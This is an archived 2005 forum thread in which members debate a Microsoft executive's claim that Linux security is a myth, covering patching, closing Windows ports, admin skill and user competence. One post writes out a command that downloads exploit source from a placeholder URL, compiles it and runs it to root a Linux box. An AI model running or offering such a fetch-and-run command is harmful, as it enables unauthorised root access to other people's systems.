Valhalla Legends Forums Archive | General Discussion | Linux security is a "myth", claims Microsoft

AuthorMessageTime
hismajesty
I like Microsoft and most of their products, but I'm not at fanboy status thankfully. Microsofts comments are absurd, though, imho.

[quote]
Linux security is a 'myth', claims Microsoft
Open source OS 'not ready for mission-critical computing'
Robert Jaques, vnunet.com 28 Jan 2005
ADVERTISEMENT

A senior Microsoft executive, speaking exclusively to vnunet.com, has dismissed Linux's reputation as a secure platform as a "myth", claiming that the open source development process creates fundamental security problems.

Nick McGrath, head of platform strategy for Microsoft in the UK, said that the myths surrounding the open source operating system are rapidly being exploded, and that customers are dismissing Linux as too immature to cope with mission-critical computing.

"The biggest challenge we need to face centres on the myth and reality. There are lots of myths out there as to what Linux can do. One myth we see is that Linux is more secure than Windows. Another is that there are no viruses for Linux," said McGrath.

"Who is accountable for the security of the Linux kernel? Does Red Hat, for example, take responsibility? It cannot, as it does not produce the Linux kernel. It produces one distribution of Linux.

"In Microsoft's world customers are confidant that we take responsibility. They know that they will get their upgrades and patches."

McGrath went on to claim that another Linux myth centres on the number of open source developers who work to create the operating system.

"There a myth in the market that there are hundreds of thousands of people writing code for the Linux kernel. This is not the case; the number is hundreds, not thousands," he said.

"If you look at the number of people who contribute to the kernel tree, you see that a significant amount of the work is just done by a handful.

"There are very few of the improvements that come through the wider community. There are more skilled developers writing for the Microsoft platform than for open source.

"The way that 2004 started off there were a lot of myths in the marketplace around the cost and capability of Linux. But now a lot of the ideology has been replaced with commercial reality."

McGrath argued that recent growth in Linux deployments came largely at the expense of installed Unix systems, rather than replacement of Windows servers.

"We are increasingly seeing that the biggest challenges in the marketplace are less for Microsoft and more in the Unix space. Customers are moving away from Risc to Intel as the price performance ratio is compelling," he said.

"A lot of the percentage growth figures mask the fact that Linux is coming from a very small base. There are more Unix servers than Linux servers in the UK. There are more Windows servers than Linux servers in the UK."

The credibility of Linux in the enterprise is beginning to suffer, according to McGrath, as companies complete trials and find the platform wanting.

"A lot of customers have got trials and pilots of Linux, but are holding back Linux deployment into the mainstream because the operating system does not have the solution stack that they were expecting," he said.

"Most customers look for more than just a product from their vendors. They need a solution that comes with the appropriate levels of support and service. This is where Linux is becoming more challenged as people expect more from Linux.

"Linux is not ready for mission-critical computing. There are fundamental things missing. For example, there is no single development environment for Linux as there is for Microsoft, neither is there a single sign-on system.

"There are bits of the Linux software stack that are missing. These are factors that are holding back Linux."[/quote]

http://www.vnunet.com/news/1160853

Discuss.
January 30, 2005, 3:52 PM
Newby
I used to think Linux was super secure.

Then, my friend rooted me with one command. :/

"wget <url>/d.c && gcc -O2 d.c -o a.out && ./a.out"

:(
January 30, 2005, 4:23 PM
Arta
Well, that's probably your fault, not linux's - nothing is 'super secure' independent of people.

As for the article: Classic FUD.
January 30, 2005, 4:25 PM
Newby
It was "the latest kernel exploit", according to the person who supplied him the source code.

And my kernel was out of date at the time, so eh? :(
January 30, 2005, 4:40 PM
Kp
So then it was your own fault for not keeping up with kernel patches.  Windows has had its share of kernel vulnerabilities too, and I'm quite sure he could've exploited one of those against you if he had permission to run stuff on your Windows box.  The only guards against kernel vulnerabilities are: 1) keeping your kernel patched up to prevent it and 2) not allowing untrustworthy people permission to run programs on your system!

As for the article: silly in the extreme.  Single sign-on has always seemed like a bad idea to me, so I consider it rather valuable that Linux lacks it.  Also, I like his claim that Microsoft takes responsibility for their stuff.  That must be why their EULAs (like all EULAs, actually) disclaim that the makers have any liability for anything whatsoever that might or might not happen as a result of your use of their software.
January 30, 2005, 5:48 PM
Arta
Just about every license disclaims liability. Interestingly, many of those license are unenforceable here in the UK, because you can't disclaim all liability :)
January 30, 2005, 5:51 PM
Kp
[quote author=Arta[vL] link=topic=10368.msg97432#msg97432 date=1107107479]Just about every license disclaims liability.[/quote]

Sure, and given how U.S. courts work it definitely makes sense for authors selling over here to do that.  My point was how silly it is for him to claim Microsoft takes responsibility for anything when they disclaim all liability, charge for any support, regularly need to issue critical security updates (sometimes weeks after disclosure), etc. :)
January 30, 2005, 5:58 PM
peofeoknight
Linux will always be inherently more secrue because of it's setup in which the normal files are separate from the os files. Until ms adopts something more like that linux will always have a leg up on them.
January 30, 2005, 7:11 PM
iago
on Linux, if I don't want any ports open, I disable all services (ssh, telnet, ftp, etc.).  Then I have 0 ports open.  Good luck remotely exploiting that.

on Windows, if I don't want any ports open, I have to buy a firewall. 
January 30, 2005, 11:24 PM
Adron
[quote author=iago link=topic=10368.msg97500#msg97500 date=1107127490]
on Linux, if I don't want any ports open, I disable all services (ssh, telnet, ftp, etc.).  Then I have 0 ports open.  Good luck remotely exploiting that.

on Windows, if I don't want any ports open, I have to buy a firewall. 
[/quote]

Overflows in the IP stack itself or in the firewall can still be exploited. I think there has been exploits available that didn't require any open ports?
January 30, 2005, 11:27 PM
kamakazie
[quote author=iago link=topic=10368.msg97500#msg97500 date=1107127490]
on Windows, if I don't want any ports open, I have to buy a firewall. 
[/quote]

I don't have a firewall and I have no unwanted ports open (only 3389 which is for Remote Desktop since I use it often when going to CS labs) on Windows XP.  Easy enough to accomplish.
January 31, 2005, 12:22 AM
iago
Adron - I thought of that, but shh. 

How do you close 135/139/445/`1025/etc?  I could never find out how
January 31, 2005, 12:41 AM
kamakazie
[quote author=iago link=topic=10368.msg97515#msg97515 date=1107132114]
Adron - I thought of that, but shh. 

How do you close 135/139/445/`1025/etc?  I could never find out how
[/quote]

Turn off DCOM (registry), Netbios (TCP/IP Configuration), and remove TransportBindName (registry).  Everything can be turned off it's just a matter of searching for it.  It may not be as easy as linux but it can be done.
January 31, 2005, 2:11 AM
peofeoknight
I know plenty of people who are sysadmins over linux and win servers. How secure the server is just depends on how competent the admin is. An new admin who does not know what he is doing can have his systems exploited no matter what os there is. If the admin knows what he is doing windows is pretty secure. My one problem with windows, as said before, is that the os files are mixed in with everything else. If a hacker can get in then they can really mess things up.
January 31, 2005, 2:22 AM
tA-Kane
[quote author=quasi-modo link=topic=10368.msg97547#msg97547 date=1107138147]My one problem with windows, as said before, is that the os files are mixed in with everything else. If a hacker can get in then they can really mess things up.
[/quote]If the non-admin programs aren't allowed to move, change, delete, or even access the system files, then what vulnerability is there?
January 31, 2005, 2:36 AM
Kp
[quote author=tA-Kane link=topic=10368.msg97551#msg97551 date=1107138984][quote author=quasi-modo link=topic=10368.msg97547#msg97547 date=1107138147]My one problem with windows, as said before, is that the os files are mixed in with everything else. If a hacker can get in then they can really mess things up.[/quote]If the non-admin programs aren't allowed to move, change, delete, or even access the system files, then what vulnerability is there?[/quote]

Kernel.  But that aside, the situation you describe doesn't happen often (in my experience).  Far too many tools, both Microsoft-made and third-party wrongly require administrative privilege to function properly.  Then there's the issue that most services are run with high privileges too, so exploiting any of those will get you in, etc.

dxoi: have you noticed any degradation of usability from turning those off?  The last time I tried shutting down DCOM, Explorer became nearly unusable (even for performing tasks that don't require any network access).
January 31, 2005, 3:24 AM
kamakazie
[quote author=Kp link=topic=10368.msg97565#msg97565 date=1107141853]
dxoi: have you noticed any degradation of usability from turning those off?  The last time I tried shutting down DCOM, Explorer became nearly unusable (even for performing tasks that don't require any network access).
[/quote]

No, nothing unusual.  Explorer works fine.
January 31, 2005, 4:21 AM
iago
I think that one of the main problems with Windows is it's ease of use.  Windows encourages people who don't know how to use computers to use them, and of course they screw it up.  Most viruses/spyware/spam/etc. rely on stupid people using a computer.  Of course, a lot of stuff is also caused by a buggy OS.  Those two factors combine creating a big problem on Microsoft's products.
January 31, 2005, 5:10 AM
kamakazie
[quote author=iago link=topic=10368.msg97589#msg97589 date=1107148210]
I think that one of the main problems with Windows is it's ease of use.  Windows encourages people who don't know how to use computers to use them, and of course they screw it up.  Most viruses/spyware/spam/etc. rely on stupid people using a computer.  Of course, a lot of stuff is also caused by a buggy OS.  Those two factors combine creating a big problem on Microsoft's products.
[/quote]

So we should make it harder to use?  Interesting thought....
January 31, 2005, 5:55 AM
EpicOfTimeWasted
[quote author=dxoigmn link=topic=10368.msg97592#msg97592 date=1107150917]So we should make it harder to use?  Interesting thought....[/quote]

My way of looking at it is similar to looking at how driver's licenses are handled.  In order to legally drive a car, the driver must have a license.  The license says that the driver knows how to operate the vehicle without causing harm to other drivers.  If you don't know the gas pedal from the brake pedal, you have no business driving a car.

Likewise, if you ask someone what kind of computer they have, and they read you off the model number on the face of their monitor, they have no business using a computer.  One person calls it "making it harder to use", another person calls it "forcing people to know what they're doing".
January 31, 2005, 6:49 AM
kamakazie
[quote author=EpicOfTimeWasted link=topic=10368.msg97594#msg97594 date=1107154197]
[quote author=dxoigmn link=topic=10368.msg97592#msg97592 date=1107150917]So we should make it harder to use?  Interesting thought....[/quote]

My way of looking at it is similar to looking at how driver's licenses are handled.  In order to legally drive a car, the driver must have a license.  The license says that the driver knows how to operate the vehicle without causing harm to other drivers.  If you don't know the gas pedal from the brake pedal, you have no business driving a car.

Likewise, if you ask someone what kind of computer they have, and they read you off the model number on the face of their monitor, they have no business using a computer.  One person calls it "making it harder to use", another person calls it "forcing people to know what they're doing".
[/quote]

You can't really do harm in the same way a car can.  You can argue that maybe they're computer will become a zombie for some DDoS attack, but then I'd argue anyone's car could be stolen to be used for a robbery.  I don't think the comparison holds, unless you have some sort of argument where operating a computer will cause harm to other computer users.
January 31, 2005, 6:56 AM
tA-Kane
[quote author=dxoigmn link=topic=10368.msg97595#msg97595 date=1107154594]
[quote author=EpicOfTimeWasted link=topic=10368.msg97594#msg97594 date=1107154197]
[quote author=dxoigmn link=topic=10368.msg97592#msg97592 date=1107150917]So we should make it harder to use? Interesting thought....[/quote]

My way of looking at it is similar to looking at how driver's licenses are handled. In order to legally drive a car, the driver must have a license. The license says that the driver knows how to operate the vehicle without causing harm to other drivers. If you don't know the gas pedal from the brake pedal, you have no business driving a car.

Likewise, if you ask someone what kind of computer they have, and they read you off the model number on the face of their monitor, they have no business using a computer. One person calls it "making it harder to use", another person calls it "forcing people to know what they're doing".
[/quote]

You can't really do harm in the same way a car can. You can argue that maybe they're computer will become a zombie for some DDoS attack, but then I'd argue anyone's car could be stolen to be used for a robbery. I don't think the comparison holds, unless you have some sort of argument where operating a computer will cause harm to other computer users.
[/quote]Or worse, it could get infected with a trojan and used to store child porn. That's occured many times; a computer-illiterate person is arrested and charged with federal child pornography crap because his computer had a trojan which allowed a remote hacker to store his 'stuff on the guy's computer unknowningly.

Imagine something similar to your car; drug dealers using a hidden area under your car to hold their goods. When you're asleep or at work or in the store, they secretly go into your car and exchange goods with 'customers'. Then when you're caught with it, you're the one with the federal drug trafficing charges, and he gets away cleanly.
January 31, 2005, 7:56 AM
kamakazie
[quote author=tA-Kane link=topic=10368.msg97601#msg97601 date=1107158181]
Or worse, it could get infected with a trojan and used to store child porn. That's occured many times; a computer-illiterate person is arrested and charged with federal child pornography crap because his computer had a trojan which allowed a remote hacker to store his 'stuff on the guy's computer unknowningly.

Imagine something similar to your car; drug dealers using a hidden area under your car to hold their goods. When you're asleep or at work or in the store, they secretly go into your car and exchange goods with 'customers'. Then when you're caught with it, you're the one with the federal drug trafficing charges, and he gets away cleanly.
[/quote]

Yes, but that doesn't "hurt" anyone else.
January 31, 2005, 2:43 PM
iago
A computer, in the hands of a moron, can do damage to other comptuers.  SQL Slammer used to hit us at work once every two seconds.  A new Windows XP computer will have blaster/sasser within a minute.  These are because of people who don't know how to operate a computer, and these totally cause damage. 

I agree that people should have to have a license to operate their OS.  That would be really cool :)
January 31, 2005, 5:34 PM
kamakazie
[quote author=iago link=topic=10368.msg97619#msg97619 date=1107192871]
A computer, in the hands of a moron, can do damage to other comptuers.  SQL Slammer used to hit us at work once every two seconds.  A new Windows XP computer will have blaster/sasser within a minute.  These are because of people who don't know how to operate a computer, and these totally cause damage. 

I agree that people should have to have a license to operate their OS.  That would be really cool :)
[/quote]

That doesn't hurt people though.  If anything, it makes people richer because then those morons need to higher techs to clean up their computers.
January 31, 2005, 8:41 PM
iago
[quote author=dxoigmn link=topic=10368.msg97653#msg97653 date=1107204078]
[quote author=iago link=topic=10368.msg97619#msg97619 date=1107192871]
A computer, in the hands of a moron, can do damage to other comptuers.  SQL Slammer used to hit us at work once every two seconds.  A new Windows XP computer will have blaster/sasser within a minute.  These are because of people who don't know how to operate a computer, and these totally cause damage. 

I agree that people should have to have a license to operate their OS.  That would be really cool :)
[/quote]

That doesn't hurt people though.  If anything, it makes people richer because then those morons need to higher techs to clean up their computers.
[/quote]

It can hurt people.  What if a traffic control system gets shut down? 

It can't hurt people physically, but it can hurt mentally and very much financially.
January 31, 2005, 11:56 PM
Myndfyr
[quote author=iago link=topic=10368.msg97589#msg97589 date=1107148210]
I think that one of the main problems with Windows is it's ease of use.  Windows encourages people who don't know how to use computers to use them, and of course they screw it up.  Most viruses/spyware/spam/etc. rely on stupid people using a computer.  Of course, a lot of stuff is also caused by a buggy OS.  Those two factors combine creating a big problem on Microsoft's products.
[/quote]

Well, that's why they're called "social engineering" attacks.  Unfortunately, while the Linux learning curve remains as steep as it is (even with the nice X-Windows system, and my favorite desktop manager KDE), it's going to be a while before Windows is fixed.
February 1, 2005, 1:06 AM
EpicOfTimeWasted
[quote author=dxoigmn link=topic=10368.msg97595#msg97595 date=1107154594]
You can't really do harm in the same way a car can.  You can argue that maybe they're computer will become a zombie for some DDoS attack, but then I'd argue anyone's car could be stolen to be used for a robbery.  I don't think the comparison holds, unless you have some sort of argument where operating a computer will cause harm to other computer users.
[/quote]

True, there is no way to directly compare the damage a car can do versus the damage a computer can do, but that wasn't really my point.  iago's traffic control system failure is a perfect example of the point I was trying to make.

Another example of computers causing harm: [url]http://www.cincypost.com/2004/12/28/comp12-28-2004.html[/url].  16bit value rolled over, all hell broke loose.
February 1, 2005, 4:11 AM
kamakazie
What if someone steals a car and uses it to run little kids over?  So yeah, I see that home computer users now have computers that control traffic lights and therefore should be required to have a license.
February 1, 2005, 4:53 AM
mynameistmp
[quote] How secure the server is just depends on how competent the admin is. [/quote]

How secure the server is depends on who is hacking the server.

[quote] I used to think Linux was super secure.

Then, my friend rooted me with one command. :/
[/quote]

Your friend couldn't hack you for his life. He was given the command to show how easy it was. This example is a tribute to the above statement.

[quote] An new admin who does not know what he is doing can have his systems exploited no matter what os there is. [/quote]

Any admin's system can be exploited no matter what os there is.

The theme here is that the OS doesn't matter, the admin doesn't matter, it's the people hacking the OS. When there are millions of vulnerable unix nodes per subnet and entire nations do their online banking via unix PCs, the hacker community will turn their focus (arguably back) to unix.

The Microsoft guy is right, Linux is not ready for critical computing or whatever he called it - but neither is Windows.
February 1, 2005, 9:01 AM
Grok
The voice of reason and experience -- tmp.  Good reply.

Linux advocates spend 90% of their arguments on supposed (or real) security differences between it and Windows, forgetting that it is only one aspect of a computer's function.  The people who buy computers spend 90% of their time doing a particular function, because they bought it as a tool.

Your TV is not secure.  Someone can sit across the street and looking at the light reflecting from your living room wall, they can reproduce exactly what your are watching, even that secret porno you and your wife recorded on your honeymoon.  But do people care about TV security?  Not usually.

Linux has very little comparative usability.  On Windows a relative idiot can walk up to it, insert a CD, install a program, and run it to accomplish a job.
February 1, 2005, 1:40 PM
iago
Of course, that same idiot will find their computer rebooting every couple minutes (with a 60 second warning) every time they get Sasser/Blaster.  Then you have to teach that idiot how to install a firewall.  Then he downloads and runs viruses, so you have to teach him how to use a virus scanner.  Then the idiot gets confused, and screws stuff up, and ends up as Yet Another DDoS Zombie.

Idiots shouldn't be using computers without supervision.

But back to Tmp's post, the administrator of a system totally matters.  If the admin is an idiot, then they will get exploited regardless of OS.  If the admin is clever, and keeps his software updated, and keeps vulnerable services not running, then there is much less of a chance of getting exploited.  The admin is one of the keys to good security.  I really don't see how you can argue against that.

February 1, 2005, 5:03 PM
Grok
[quote author=iago link=topic=10368.msg97779#msg97779 date=1107277411]
Of course, that same idiot will find their computer rebooting every couple minutes (with a 60 second warning) every time they get Sasser/Blaster.  Then you have to teach that idiot how to install a firewall.  Then he downloads and runs viruses, so you have to teach him how to use a virus scanner.  Then the idiot gets confused, and screws stuff up, and ends up as Yet Another DDoS Zombie.

Idiots shouldn't be using computers without supervision.

But back to Tmp's post, the administrator of a system totally matters.  If the admin is an idiot, then they will get exploited regardless of OS.  If the admin is clever, and keeps his software updated, and keeps vulnerable services not running, then there is much less of a chance of getting exploited.  The admin is one of the keys to good security.  I really don't see how you can argue against that.


[/quote]

Did someone argue against that?  You seem to have the opinion that there are only two kinds of people in the world -- Linux security-conscious competent geniuses, .... and idiots who use Windows.  As wrong as your opinion would then be, you do not seem to explore any other segment of computing.  In post after post, your focus seems to be extremely narrow.  You're far smarter than to have this myopic view, and I hope you are able to grow into your potential.
February 1, 2005, 6:31 PM
Arta
I didn't get that impression at all. I think he was trying to say that good administration will keep a machine reasonably secure, independent of what OS it runs.
February 1, 2005, 7:10 PM
iago
[quote author=Grok link=topic=10368.msg97788#msg97788 date=1107282660]
Did someone argue against that?
[/quote]

[quote author=mynameistmp link=topic=10368.msg97752#msg97752 date=1107248462]
The theme here is that the OS doesn't matter, the admin doesn't matter, it's the people hacking the OS. [/quote]

My argument is that the admin does indeed matter

No matter which OS you're on, the admin is probably the most important factor.  I'm pretty sure that's what I was arguing in my post.  When I say "idiots", I'm not only referring to Windows users (just mostly ;))


The part about the "idiot" infected with viruses within minutes, and having to learn a bunch more stuff to be secure, was intended as an argument against windows' ease of use stated here:
[quote]On Windows a relative idiot can walk up to it, insert a CD, install a program, and run it to accomplish a job.[/quote]
With security the way it is now, Windows really isn't that simple, at least, not to administrate.
February 1, 2005, 7:28 PM
Grok
Well then again I disagree.  The level of knowledge necessary to make Linux as useful a production tool is far more than the level of knowledge necessary to "secure" Windows administratively, even by following a cookbook of instructions.

What tmp so eloquently pointed out is that regardless of the administrator, the hackability of the OS is inherent in the software.  I think maybe if you read it from a different context, you will see what he means, and you might even realize he has a good point.
February 1, 2005, 8:49 PM
mynameistmp
[quote]The theme here is that the OS doesn't matter, the admin doesn't matter, it's the people hacking the OS.[/quote]

Haha, iago, my good man, I have mistakenly mislead you. Perhaps a bad choice of words on my part. This statement was meant to be applied to a more broad context. I wouldn't care to elaborate for many people other than you ;P

[quote] One myth we see is that Linux is more secure than Windows. Another is that there are no viruses for Linux," said McGrath.[/quote]

Mr. McGrath is displaying Microsoft's frustration with the fact that the number of viruses targeting Microsoft lately is higher than the number targeting Linux causing some users to believe that Microsoft software must be less secure than Linux software. My point (and I think Mr.McGrath's) is that the overall security of Microsoft software is not what's causing the overwhelming number of viruses, and it is not the improperly (or properly) trained admins of the OS. The viruses are being written by hackers taking the time and due  dilligence to target the OS. The number of viruses will not sway because Microsoft admins become better at what they do, or because Windows becomes more secure (http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm). This number will sway when the people designing the viruses become interested in another platform and turn focus.

[quote] But back to Tmp's post, the administrator of a system totally matters. [/quote]

The competence of the administrators of the OS is not the topic that the Microsoft rep is speaking about. The topic he is discussing is which OS is more secure. A good admin can make a system more secure, but having a knowledgable user base does not make a product itself secure. If a software product designed for home users to be used for convenience or leisure (how about Windows XP Home Ed., or Novell Linux Desktop 9) requires the admin (in this case, user) to be highly trained in order for it to be functional and safe, that would imply that the software is insecure or poorly designed.

To sum it up, by saying that the admin does not matter I meant that administrators are not an important factor in this discussion. I did not mean to imply that administrators don't make a difference on a system-to-system basis.



February 1, 2005, 9:14 PM
iago
Grok - If I didn't know any better, I think you're trying to attack my view points in general, not in the context of this thread, while at the same  time not giving any facts or arguments to back it up.  My posts here have been basically, "The OS is only as secure as its user (or administrator)" -- do you deny that?  If you want to have an argument, at least reply with some kind of arguments, or agree with me :P

And this:
[quote author=Grok link=topic=10368.msg97800#msg97800 date=1107290994]
What tmp so eloquently pointed out is that regardless of the administrator, the hackability of the OS is inherent in the software.
[/quote]
I went back and I haven't got a clue where Tmp said that.  In any case, I agree -- but the software on a computer is what is installed by its users, which still fits with what I said -- the OS is as strong as its user (or administrator)
February 1, 2005, 9:28 PM
Grok
From Slashdot discussion.

[quote]Working on my own DS_Linux (Score:3, Interesting)
by Dancin_Santa (265275) <DancinSanta@gmail.com> on Wednesday February 02, @06:55AM (#11549393)
(Last Journal: Friday December 24, @08:49PM) 
On occasion I like to call it Santix, but I don't want to step on anyone's toes, so I just prepend my initials in front of "Linux" (RMS be damned).

The main thing that I try to focus on is security, and being on the LCML security mailing list has greatly improved my ability to find and squash security issues. You wouldn't believe how many security issues Linux has, actually. Luckily, most of the easy things like buffer exploits are already taken care of. The remaining issues are primarily involved in the timing issues of thread and process context switching. Exploiting the system vulnerability when it is grabbing and releasing resources. That kind of thing.

Whether or not the security list is part of the main LCML list is not really a primary concern. I'd rather have those guys working on features and we on the Security side can get those features secure. If we spent all our time thinking about how to make the system secure, we'd still be stuck with an age-old kernel like OpenBSD!

[/quote]
February 2, 2005, 1:02 PM
TehUser
Just to kind of clarify, I think (and correct me if I'm wrong, tmp) the point that tmp was trying to make is that no matter who the admin is, regardless of how much security he has in place, if the hacker going after your network is dedicated and knowledgable, it will eventually fall.  And in that sense, how competent the administrator is just does not matter.
February 2, 2005, 1:26 PM
iago
[quote author=Grok link=topic=10368.msg97880#msg97880 date=1107349323]
From Slashdot discussion.

[quote]Working on my own DS_Linux (Score:3, Interesting)
by Dancin_Santa (265275) <DancinSanta@gmail.com> on Wednesday February 02, @06:55AM (#11549393)
(Last Journal: Friday December 24, @08:49PM) 
On occasion I like to call it Santix, but I don't want to step on anyone's toes, so I just prepend my initials in front of "Linux" (RMS be damned).

The main thing that I try to focus on is security, and being on the LCML security mailing list has greatly improved my ability to find and squash security issues. You wouldn't believe how many security issues Linux has, actually. Luckily, most of the easy things like buffer exploits are already taken care of. The remaining issues are primarily involved in the timing issues of thread and process context switching. Exploiting the system vulnerability when it is grabbing and releasing resources. That kind of thing.

Whether or not the security list is part of the main LCML list is not really a primary concern. I'd rather have those guys working on features and we on the Security side can get those features secure. If we spent all our time thinking about how to make the system secure, we'd still be stuck with an age-old kernel like OpenBSD!

[/quote]
[/quote]

Ok, are you going to attack my position yet, or just post completely irrelevant stuff? 
February 2, 2005, 2:19 PM
Adron
Linux is actually more securable than Windows for the simple reason that with Windows you're in the hands of Microsoft. Until Microsoft decide to offer you the option to turn off a service, you cannot do it yourself. With linux, you have, and always have had all the options. If Microsoft decides to stop supporting a certain version of a product, you're out of luck.
February 2, 2005, 3:45 PM
EpicOfTimeWasted
[quote author=Adron link=topic=10368.msg97887#msg97887 date=1107359158]
Linux is actually more securable than Windows for the simple reason that with Windows you're in the hands of Microsoft. Until Microsoft decide to offer you the option to turn off a service, you cannot do it yourself. With linux, you have, and always have had all the options. If Microsoft decides to stop supporting a certain version of a product, you're out of luck.
[/quote]

Nothing in the computer world pisses me off more than when I try to kill a process in Windows, while logged in as Administrator, and Windows flatly tells me "No!"  Instead of arguing with me, it should kill the process and let me, the Administrator, deal with any of the after effects.  My FreeBSD box will let me do whatever I damned well please when I'm logged in as root.

I suppose some could argue that that's part of the reason they consider linux to be insecure, but I'd argue that it gives the level of control required to ensure that your box is as secure as it can be.
February 2, 2005, 6:05 PM
kamakazie
[quote author=EpicOfTimeWasted link=topic=10368.msg97895#msg97895 date=1107367533]
[quote author=Adron link=topic=10368.msg97887#msg97887 date=1107359158]
Linux is actually more securable than Windows for the simple reason that with Windows you're in the hands of Microsoft. Until Microsoft decide to offer you the option to turn off a service, you cannot do it yourself. With linux, you have, and always have had all the options. If Microsoft decides to stop supporting a certain version of a product, you're out of luck.
[/quote]

Nothing in the computer world pisses me off more than when I try to kill a process in Windows, while logged in as Administrator, and Windows flatly tells me "No!"  Instead of arguing with me, it should kill the process and let me, the Administrator, deal with any of the after effects.  My FreeBSD box will let me do whatever I damned well please when I'm logged in as root.

I suppose some could argue that that's part of the reason they consider linux to be insecure, but I'd argue that it gives the level of control required to ensure that your box is as secure as it can be.
[/quote]

Example of this happening?

Edit: Clarification, examples of not being able to kill a process in windows.
February 2, 2005, 9:04 PM
iago
Example of what?

If you mean of the full control creating less security, the only real problem is that if a service running with root privilidges is exploited, the attacker gets full control.  Of course, services shouldn't be running with root privilidges in the first place.
February 2, 2005, 9:05 PM
Arta
I find that pskill usually lets me kill things that task manager refuses to do.
February 3, 2005, 3:05 AM
Zakath
And I can't remember the last time I had that problem (I *have* had it, but it's so ridiculously rare as to be discountable). Does this happen to you frequently? If so, you might want to examine why those processes are running in the first place. :P
February 3, 2005, 5:16 AM
iago
Other control I enjoy on Linux is the ability to delete files that are running or open, if you're root :)
February 3, 2005, 12:42 PM
Zakath
Ah, yes. That's always fun. Yesterday I deleted a program I had running, logged back in later, and it struck me that I hadn't killed the program. Sure enough, there it was, chugging away. Definitely an amusing (and useful) capability, but also dangerous if you aren't careful.
February 3, 2005, 4:40 PM
Adron
You can delete open files on Windows as well actually, if file sharing isn't blocking it. Linux needs to enable file sharing specifically?
February 3, 2005, 5:09 PM
EpicOfTimeWasted
[quote author=EpicOfTimeWasted link=topic=10368.msg97895#msg97895 date=1107367533]
Nothing in the computer world pisses me off more than when I try to kill a process in Windows, while logged in as Administrator, and Windows flatly tells me "No!"  Instead of arguing with me, it should kill the process and let me, the Administrator, deal with any of the after effects.  My FreeBSD box will let me do whatever I damned well please when I'm logged in as root.
[/quote]

Ok, I'll admit this was a badly written post.  My point was more about the level of control that a unix-based system offers, more-so than when Windows decides to not let me kill processes (since it doesn't happen overly often, just at the most inopportune times).
February 3, 2005, 5:40 PM
Grok
Always continuing to offer another viewpoint of the same situation:

Then in the context of security, one could say that your system does not secure its stability very well against the mistakes of the administrator, compared to Windows, which may offer more protection of files and processes it views as important to the overall system health.  Depending on how you define stability and security, one could say that.
February 3, 2005, 6:53 PM
iago
Generally on Linux, if a file is open then it's locked to a normal user/the owning user.  Root, however, really does have full control.  Root can write to kernel memory, or delete any locked file, or whatever it wants to.  It can be very dangerous, of course.  Root can do plenty of damage.
February 3, 2005, 7:54 PM
Thing
My two copper on this subject.

Weak passwords and stupid people are the greatest computer security threats.  Brute force and social engineering are by far the easiest, fastest ways to compromise a network.  Why spend all day jacking with trying to crack a box when you can call up some dumbass inside and get them to tell you their password?
February 3, 2005, 8:29 PM

Search